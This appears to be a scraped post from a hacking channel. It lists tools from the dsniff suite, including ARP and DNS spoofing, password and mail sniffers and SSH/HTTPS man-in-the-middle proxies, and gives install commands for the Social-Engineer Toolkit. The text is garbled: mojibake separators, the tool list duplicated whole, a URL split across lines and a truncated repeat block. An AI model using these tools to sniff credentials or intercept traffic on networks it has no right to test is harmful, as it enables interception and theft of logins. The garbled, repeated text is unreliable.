โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - sullo/nikto: Nikto web server scanner
Nikto web server scanner. Contribute to sullo/nikto development by creating an account on GitHub.
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
important hackers terms :
1๏ธโฃarpspoof
redirect packets from a target host (or all hosts) on the LAN
intended for another local host by forging ARP replies. this
is an extremely effective way of sniffing traffic on a switch.
kernel IP forwarding (or a userland program which accomplishes
the same, e.g. fragroute ๐must be turned on ahead of time.
2๏ธโฃdnsspoof
forge replies to arbitrary DNS address / pointer queries on
the LAN. this is useful in bypassing hostname-based access
controls, or in implementing a variety of man-in-the-middle
attacks (HTTP, HTTPS, SSH, Kerberos, etc).
3๏ธโฃdsniff
password sniffer. handles FTP, Telnet, SMTP, HTTP, POP,
poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP
MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ,
Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec
pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL,Net, Sybase
and Microsoft SQL auth info.
4๏ธโฃ dsniff automatically detects and minimally parses each
application protocol, only saving the interesting bits, and
uses Berkeley DB as its output file format, only logging
unique authentication attempts. full TCP/IP reassembly is
provided by libnids(3) (likewise for the following tools as
well).
5๏ธโฃfilesnarf
saves selected files sniffed from NFS traffic in the current
working directory.
6๏ธโฃmacof
flood the local network with random MAC addresses (causing
some switches to fail open in repeating mode, facilitating
sniffing). a straight C port of the original Perl Net::RawIP
macof program.
7๏ธโฃmailsnarf
a fast and easy way to violate the Electronic Communications
Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs
selected messages sniffed from SMTP and POP traffic in Berkeley
mbox format, suitable for offline browsing with your favorite
mail reader (mail -f, pine, etc.).
8๏ธโฃmsgsnarf
record selected messages from sniffed AOL Instant Messenger,
ICQ 2000, IRC, and Yahoo! Messenger chat sessions.
9๏ธโฃsshmitm
SSH monkey-in-the-middle. proxies and sniffs SSH traffic
redirected by dnsspoof(8), capturing SSH password logins, and
optionally hijacking interactive sessions. only SSH protocol
version 1 is (or ever will be) supported - this program is far
too evil already.
๐sshow
SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2
traffic, identifying authentication attempts, the lengths of
passwords entered in interactive sessions, and command line
lengths.
1๏ธโฃ1๏ธโฃtcpkill
kills specified in-progress TCP connections (useful for
libnids-based applications which require a full TCP 3-whs for
TCB creation).
1๏ธโฃ2๏ธโฃtcpnice
slow down specified TCP connections via "active" traffic
shaping. forges tiny TCP window advertisements, and optionally
ICMP source quench replies.
1๏ธโฃ3๏ธโฃurlsnarf
output selected URLs sniffed from HTTP traffic in CLF
(Common Log Format, used by almost all web servers), suitable
for offline post-processing with your favorite web log
analysis tool (analog, wwwstat, etc.).
1๏ธโฃ4๏ธโฃwebmitm
HTTP / HTTPS monkey-in-the-middle. transparently proxies and
sniffs web traffic redirected by dnsspoof(8), capturing most
"secure" SSL-encrypted webmail logins and form submissions.
1๏ธโฃ5๏ธโฃwebspy
sends URLs sniffed from a client to your local Netscape
browser for display, updated in real-time (as the target
surfs, your browser surfs along with them, automagically).
a fun party trick.
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
important hackers terms :
1๏ธโฃarpspoof
redirect packets from a target host (or all hosts) on the LAN
intended for another local host by forging ARP replies. this
is an extremely effective way of sniffing traffic on a switch.
kernel IP forwarding (or a userland program which accomplishes
the same, e.g. fragroute ๐must be turned on ahead of time.
2๏ธโฃdnsspoof
forge replies to arbitrary DNS address / pointer queries on
the LAN. this is useful in bypassing hostname-based access
controls, or in implementing a variety of man-in-the-middle
attacks (HTTP, HTTPS, SSH, Kerberos, etc).
3๏ธโฃdsniff
password sniffer. handles FTP, Telnet, SMTP, HTTP, POP,
poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP
MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ,
Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec
pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL,Net, Sybase
and Microsoft SQL auth info.
4๏ธโฃ dsniff automatically detects and minimally parses each
application protocol, only saving the interesting bits, and
uses Berkeley DB as its output file format, only logging
unique authentication attempts. full TCP/IP reassembly is
provided by libnids(3) (likewise for the following tools as
well).
5๏ธโฃfilesnarf
saves selected files sniffed from NFS traffic in the current
working directory.
6๏ธโฃmacof
flood the local network with random MAC addresses (causing
some switches to fail open in repeating mode, facilitating
sniffing). a straight C port of the original Perl Net::RawIP
macof program.
7๏ธโฃmailsnarf
a fast and easy way to violate the Electronic Communications
Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs
selected messages sniffed from SMTP and POP traffic in Berkeley
mbox format, suitable for offline browsing with your favorite
mail reader (mail -f, pine, etc.).
8๏ธโฃmsgsnarf
record selected messages from sniffed AOL Instant Messenger,
ICQ 2000, IRC, and Yahoo! Messenger chat sessions.
9๏ธโฃsshmitm
SSH monkey-in-the-middle. proxies and sniffs SSH traffic
redirected by dnsspoof(8), capturing SSH password logins, and
optionally hijacking interactive sessions. only SSH protocol
version 1 is (or ever will be) supported - this program is far
too evil already.
๐sshow
SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2
traffic, identifying authentication attempts, the lengths of
passwords entered in interactive sessions, and command line
lengths.
1๏ธโฃ1๏ธโฃtcpkill
kills specified in-progress TCP connections (useful for
libnids-based applications which require a full TCP 3-whs for
TCB creation).
1๏ธโฃ2๏ธโฃtcpnice
slow down specified TCP connections via "active" traffic
shaping. forges tiny TCP window advertisements, and optionally
ICMP source quench replies.
1๏ธโฃ3๏ธโฃurlsnarf
output selected URLs sniffed from HTTP traffic in CLF
(Common Log Format, used by almost all web servers), suitable
for offline post-processing with your favorite web log
analysis tool (analog, wwwstat, etc.).
1๏ธโฃ4๏ธโฃwebmitm
HTTP / HTTPS monkey-in-the-middle. transparently proxies and
sniffs web traffic redirected by dnsspoof(8), capturing most
"secure" SSL-encrypted webmail logins and form submissions.
1๏ธโฃ5๏ธโฃwebspy
sends URLs sniffed from a client to your local Netscape
browser for display, updated in real-time (as the target
surfs, your browser surfs along with them, automagically).
a fun party trick.
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆSocial-Engineer Toolkit 2020 updated :
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
1๏ธโฃ
> Linux
>Mac OS X (experimental)
6๏ธโฃFull usage see this pdf-if you beginer :
>
@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆSocial-Engineer Toolkit 2020 updated :
๐ธ๐ฝ๐ ๐ ๐ฐ๐ป๐ป๐ธ๐ ๐ฐ๐ ๐ธ๐พ๐ฝ & ๐ ๐ ๐ฝ :
1๏ธโฃ
git clone https://github.com/trustedsec/social-engineer-
2๏ธโฃtoolkit/ setoolkit/
3๏ธโฃcd setoolkit
4๏ธโฃpip3 install -r requirements.txt
5๏ธโฃpython setup.py
๐ฆOS :> Linux
>Mac OS X (experimental)
6๏ธโฃFull usage see this pdf-if you beginer :
>
https://github.com/trustedsec/social-engineer-toolkit/raw/master/readme/User_Manual.pdf
@UndercodeTesting@UndercodeSecurity
@UndercodeHacking
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ